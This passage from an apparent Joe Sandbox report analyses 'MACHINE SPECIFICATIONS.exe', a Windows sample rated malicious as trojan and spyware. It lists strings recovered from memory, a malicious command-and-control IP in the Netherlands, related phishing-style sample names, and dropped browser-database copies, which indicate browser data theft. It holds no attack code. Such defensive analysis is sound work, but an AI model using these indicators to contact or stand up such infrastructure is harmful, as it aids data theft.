                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://forms.real.com/real/realone/download.html?type=rpsp_usMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://support.aMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ipinfo.io/ip%appdata%MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeMACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://support.google.com/chrome/?p=plugin_quicktimeMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                              		high
                                                              http://ns.adobe.cobjMACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/Endpoint/CheckConnectResponseMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://schemas.datacontract.org/2004/07/MACHINE SPECIFICATIONS.exe, 00000001.00000002.365800407.0000000003487000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://helpx.adMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                                  		high
                                                                  http://tempuri.org/Endpoint/CheckConnectMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchtmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                                    		high
                                                                    http://tempuri.org/Endpoint/SetEnvironMACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://get.adobMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://tempuri.org/t_$kMACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ac.ecosia.org/autocomplete?q=tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                                      		high
                                                                      http://185.222.58.90:1MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://service.real.com/realplayer/security/02062012_player/en/MACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://support.google.com/chrome/?p=plugin_shockwaveMACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://forms.reaMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://tempuri.org/Endpoint/GetUpdatesResponseMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://tempuri.org/Endpoint/EnvironmentSettingsResponseMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/soap/actor/nextMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://ns.ado/1MACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  185.222.58.90
                                                                                  		unknownNetherlands
                                                                                  		51447ROOTLAYERNETNLtrue

                                                                                  General Information

                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                  Analysis ID:633730
                                                                                  Start date and time: 25/05/202205:53:102022-05-25 05:53:10 +02:00
                                                                                  Joe Sandbox Product:CloudBasic
                                                                                  Overall analysis duration:0h 9m 25s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Sample file name:MACHINE SPECIFICATIONS.exe
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                  Number of analysed new started processes analysed:29
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • HDC enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@4/27@2/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HDC Information:
                                                                                  • Successful, ratio: 0% (good quality ratio 0%)
                                                                                  • Quality average: 83%
                                                                                  • Quality standard deviation: 0%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 99%
                                                                                  • Number of executed functions: 123
                                                                                  • Number of non-executed functions: 3
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Adjust boot time
                                                                                  • Enable AMSI

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
                                                                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  05:54:45API Interceptor113x Sleep call for process: MACHINE SPECIFICATIONS.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  No context

                                                                                  Domains

                                                                                  No context

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  ROOTLAYERNETNLNew Order.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.178
                                                                                  e_Receipt.pdf.exeGet hashmaliciousBrowse
                                                                                  • 45.137.22.163
                                                                                  View Payment.exeGet hashmaliciousBrowse
                                                                                  • 45.137.22.35
                                                                                  SecuriteInfo.com.Variant.Babar.54324.15185.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.79
                                                                                  PAYMENT.exeGet hashmaliciousBrowse
                                                                                  • 185.222.58.237
                                                                                  Payment.exeGet hashmaliciousBrowse
                                                                                  • 45.137.22.122
                                                                                  Quotation.xlsxGet hashmaliciousBrowse
                                                                                  • 185.222.58.51
                                                                                  Order Package.xlsxGet hashmaliciousBrowse
                                                                                  • 185.222.58.244
                                                                                  ORDER SV-033764.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.155
                                                                                  ORDER_SV-033764.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.155
                                                                                  ORDER SV-033764.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.155
                                                                                  ORDER SV-033764.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.155
                                                                                  Hzb1l180P6.exeGet hashmaliciousBrowse
                                                                                  • 45.137.22.227
                                                                                  bankreportt.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.252
                                                                                  SecuriteInfo.com.W32.AIDetectNet.01.11996.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.252
                                                                                  SecuriteInfo.com.W32.AIDetectNet.01.20266.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.252
                                                                                  aaaaaaaa.docxGet hashmaliciousBrowse
                                                                                  • 185.222.58.48
                                                                                  SecuriteInfo.com.Variant.Strictor.270970.28606.exeGet hashmaliciousBrowse
                                                                                  • 185.222.57.199
                                                                                  INV_TMB-CI2006-003.xlsxGet hashmaliciousBrowse
                                                                                  • 185.222.58.48
                                                                                  Swift Copy.exeGet hashmaliciousBrowse
                                                                                  • 45.137.22.122

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MACHINE SPECIFICATIONS.exe.log

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):617
                                                                                  Entropy (8bit):5.347480285514745
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKharkvoDLI4MWuCv:MLU84qpE4Ks2wKDE4KhK3VZ9pKhIE4Ks
                                                                                  MD5:4E2C52C54E01A6E1B1A9AE5F1DFEA744
                                                                                  SHA1:7768B945A7B642D21C1946F817C4CE91AD81BBD7
                                                                                  SHA-256:C694679BDC1CEACC4E7F1732892773372D6548C71625579BE6A8BE8F39EC95AE
                                                                                  SHA-512:23E707DB6ECBE26936723C43039DA8F57364CA24AF0448B14D8705518F5D94AD3A24A54A5522A9A1FEC8EC9868F738A8A72295F00FCC8CF02E9F5421CC86A7CC
                                                                                  Malicious:true
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                  C:\Users\user\AppData\Local\Temp\tmp1CE.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmp29B.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmp2BFC.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.69422273140364
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                  MD5:A686C2E2230002C3810CB3638589BF01
                                                                                  SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                  SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                  SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                                                                  C:\Users\user\AppData\Local\Temp\tmp396.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmp452.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\tmp4D8E.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1026
                                                                                  Entropy (8bit):4.701704028955216
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
                                                                                  MD5:5F97B24D9F05FA0379F5E540DA8A05B0
                                                                                  SHA1:D4E1A893EFD370529484B46EE2F40595842C849E
                                                                                  SHA-256:58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
                                                                                  SHA-512:A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
                                                                                  Malicious:false
                                                                                  Preview:BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

                                                                                  C:\Users\user\AppData\Local\Temp\tmp51E.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):1.1874185457069584
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
